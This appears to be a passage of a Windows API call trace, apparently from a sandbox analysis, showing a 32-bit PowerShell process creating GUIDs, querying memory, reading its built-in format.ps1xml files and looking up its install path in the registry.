	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdfa6e42f, Data2=0xeee, Data3=0x40ba, Data4=([0]=0xb4, [1]=0x2c, [2]=0xa8, [3]=0x4a, [4]=0x2a, [5]=0x8b, [6]=0x82, [7]=0x9))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd223bc08, Data2=0x63b8, Data3=0x4050, Data4=([0]=0x8a, [1]=0x34, [2]=0x62, [3]=0xc7, [4]=0xda, [5]=0xe9, [6]=0xfc, [7]=0x63))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x8018955, Data2=0xc29b, Data3=0x4084, Data4=([0]=0x8c, [1]=0x85, [2]=0x37, [3]=0xf, [4]=0xd0, [5]=0x8a, [6]=0x3f, [7]=0x64))) returned 0x0
	[0160.694] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.694] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.696] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.901] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xa8608370, Data2=0xff6e, Data3=0x45ed, Data4=([0]=0xba, [1]=0x82, [2]=0x5d, [3]=0xa6, [4]=0xd3, [5]=0x6a, [6]=0x1f, [7]=0x73))) returned 0x0
	[0160.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.901] GetLastError () returned 0x0
	[0160.901] SetErrorMode (uMode=0x1) returned 0x1
	[0160.901] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.901] GetLastError () returned 0x0
	[0160.901] GetFileType (hFile=0x34c) returned 0x1
	[0160.902] SetErrorMode (uMode=0x1) returned 0x1
	[0160.902] GetFileType (hFile=0x34c) returned 0x1
	[0160.902] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.904] GetLastError () returned 0x0
	[0160.904] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.905] GetLastError () returned 0x0
	[0160.905] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.905] GetLastError () returned 0x0
	[0160.905] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.905] GetLastError () returned 0x0
	[0160.905] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.905] GetLastError () returned 0x0
	[0160.905] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.906] GetLastError () returned 0x0
	[0160.906] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x119, lpOverlapped=0x0) returned 1
	[0160.906] GetLastError () returned 0x0
	[0160.906] ReadFile (in: hFile=0x34c, lpBuffer=0x2e29918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e29918*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0160.906] GetLastError () returned 0x0
	[0160.906] CloseHandle (hObject=0x34c) returned 1
	[0160.906] GetLastError () returned 0x0
	[0160.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.906] GetLastError () returned 0x0
	[0160.906] SetErrorMode (uMode=0x1) returned 0x1
	[0160.907] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e4a914 | out: lpFileInformation=0x2e4a914*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0160.907] GetLastError () returned 0x0
	[0160.907] SetErrorMode (uMode=0x1) returned 0x1
	[0160.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.907] GetLastError () returned 0x0
	[0160.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0160.907] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.907] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.908] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.908] GetLastError () returned 0x0
	[0160.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.908] GetLastError () returned 0x0
	[0160.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.908] GetLastError () returned 0x0
	[0160.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.908] GetLastError () returned 0x0
	[0160.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.908] GetLastError () returned 0x0
	[0160.909] VirtualQuery (in: lpAddress=0x14d030, lpBuffer=0x14e030, dwLength=0x1c | out: lpBuffer=0x14e030*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.909] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x7e73353c, Data2=0xc9c7, Data3=0x42d2, Data4=([0]=0x8c, [1]=0xad, [2]=0x7d, [3]=0xd6, [4]=0xc1, [5]=0x55, [6]=0x31, [7]=0xef))) returned 0x0
	[0160.909] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.909] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc596814e, Data2=0x875e, Data3=0x48de, Data4=([0]=0xab, [1]=0x8b, [2]=0x78, [3]=0x81, [4]=0xed, [5]=0x2c, [6]=0x4e, [7]=0xf2))) returned 0x0
	[0160.909] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x954f1cdc, Data2=0x733, Data3=0x49f7, Data4=([0]=0xae, [1]=0xa2, [2]=0x56, [3]=0x41, [4]=0x5e, [5]=0xf0, [6]=0xa3, [7]=0x66))) returned 0x0
	[0160.909] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x9af4a399, Data2=0x5c21, Data3=0x493d, Data4=([0]=0xbc, [1]=0x9b, [2]=0x29, [3]=0x22, [4]=0x9, [5]=0x8d, [6]=0x71, [7]=0x10))) returned 0x0
	[0160.909] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.910] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.910] GetLastError () returned 0x0
	[0160.910] SetErrorMode (uMode=0x1) returned 0x1
	[0160.910] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.910] GetLastError () returned 0x0
	[0160.910] GetFileType (hFile=0x34c) returned 0x1
	[0160.910] SetErrorMode (uMode=0x1) returned 0x1
	[0160.910] GetFileType (hFile=0x34c) returned 0x1
	[0160.910] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.912] GetLastError () returned 0x0
	[0160.912] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.914] GetLastError () returned 0x0
	[0160.914] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.914] GetLastError () returned 0x0
	[0160.914] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.914] GetLastError () returned 0x0
	[0160.914] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.914] GetLastError () returned 0x0
	[0160.914] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.915] GetLastError () returned 0x0
	[0160.915] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.915] GetLastError () returned 0x0
	[0160.915] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.915] GetLastError () returned 0x0
	[0160.917] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.917] GetLastError () returned 0x0
	[0160.917] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.917] GetLastError () returned 0x0
	[0160.917] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.917] GetLastError () returned 0x0
	[0160.918] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.918] GetLastError () returned 0x0
	[0160.918] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.918] GetLastError () returned 0x0
	[0160.918] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.918] GetLastError () returned 0x0
	[0160.918] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.920] GetLastError () returned 0x0
	[0160.920] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.920] GetLastError () returned 0x0
	[0160.923] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.923] GetLastError () returned 0x0
	[0160.923] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.923] GetLastError () returned 0x0
	[0160.923] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.923] GetLastError () returned 0x0
	[0160.923] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.924] GetLastError () returned 0x0
	[0160.924] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.924] GetLastError () returned 0x0
	[0160.924] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.924] GetLastError () returned 0x0
	[0160.924] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.924] GetLastError () returned 0x0
	[0160.924] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.924] GetLastError () returned 0x0
	[0160.925] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.925] GetLastError () returned 0x0
	[0160.925] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.925] GetLastError () returned 0x0
	[0160.925] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.925] GetLastError () returned 0x0
	[0160.925] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.925] GetLastError () returned 0x0
	[0160.926] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.926] GetLastError () returned 0x0
	[0160.926] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.926] GetLastError () returned 0x0
	[0160.926] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.926] GetLastError () returned 0x0
	[0160.926] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.926] GetLastError () returned 0x0
	[0160.931] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.931] GetLastError () returned 0x0
	[0160.931] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.931] GetLastError () returned 0x0
	[0160.931] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.932] GetLastError () returned 0x0
	[0160.932] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.932] GetLastError () returned 0x0
	[0160.932] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.932] GetLastError () returned 0x0
	[0160.932] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.932] GetLastError () returned 0x0
	[0160.932] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.932] GetLastError () returned 0x0
	[0160.933] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.933] GetLastError () returned 0x0
	[0160.933] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.933] GetLastError () returned 0x0
	[0160.933] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.933] GetLastError () returned 0x0
	[0160.933] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.933] GetLastError () returned 0x0
	[0160.934] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.934] GetLastError () returned 0x0
	[0160.934] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.934] GetLastError () returned 0x0
	[0160.934] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.934] GetLastError () returned 0x0
